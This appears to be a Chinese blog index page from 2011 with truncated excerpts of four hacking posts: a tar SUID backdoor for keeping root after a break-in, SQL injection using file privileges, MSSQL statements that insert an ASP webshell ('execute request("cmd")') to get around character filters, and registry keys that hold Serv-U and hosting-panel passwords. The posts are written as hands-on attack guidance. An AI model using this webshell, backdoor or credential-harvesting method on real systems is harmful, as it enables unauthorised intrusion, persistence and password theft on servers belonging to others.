2011年4月12日

利用设置tar的suid来获取root

摘要: 首先申明,这并不是一个linux tar漏洞,只是在获取linux root后通过tar留的一个后门,在一个正常的linux系统中tar被添加上了suid并不会太多的引人注目。整个执行过程如下host:~# useradd testhost:~# su testhost:/tmp$ tar xvpf root.tartar_root/tar_root/2tar: tar_root/2: time stamp 2010-11-11 04:04:34 is 77742.715113 s in the futuretar_root/3tar: tar_root/3: time stamp 2010- 阅读全文

posted @ 2011-04-12 18:50 =_=! 阅读(380) 评论(0) 推荐(0) 编辑

SQL注入和文件提权

摘要: 德国人写的关SQL注入和文件提权的文章[+]info:~~~~~~~~~WEBSECURITY DOCUMENTATIONSQL Injection with File Privilegeswritten by fred777 [fred777.5x.to][+]content:~~~~~~~~~–[0x00]– Intro–[0x01]– Knowledge [1] Load_File [2] Dumpfile und Outfile–[0x02]– Exploiting [1] Privilegien mit mysql.user [2] Privilegien mit informati 阅读全文

posted @ 2011-04-12 18:39 =_=! 阅读(274) 评论(0) 推荐(0) 编辑

Mssql备份得webshell突破特殊字符限制

摘要: 1.插入数据mssql注射使用Backup或makewebtask得到webshell,在写入webshell代码时,如果过滤了一些特殊字符,如" '等。我们先mssql分析器里“查询”:use pubs; <===使用数据库pubscreate table cmd (str image); <===建立个表cmd 一个属性为image的列insert into cmd (str) values ('<%execute request("cmd")&""%>') <===插入数据为 阅读全文

posted @ 2011-04-12 17:24 =_=! 阅读(248) 评论(0) 推荐(0) 编辑

渗透测试时用到的注册表键值

摘要: 平时收集的,一般服务器对注册表的读取 很少限制的,往往从注册表中能获取不少信息HKEY_LOCAL_MACHINE\SYSTEM\Control001\Services\ #获取一些服务信息HKEY_LOCAL_MACHINE\SOFTWARE\Cat Soft\Serv-U\Domains\1\UserList\ #server-uHKEY_LOCAL_MACHINE\software\hzhost\config\settings\mysqlpassHKEY_LOCAL_MACHINE\software\hzhost\config\settings\mastersvrpassHKEY_LOC 阅读全文

posted @ 2011-04-12 17:22 =_=! 阅读(292) 评论(0) 推荐(0) 编辑

导航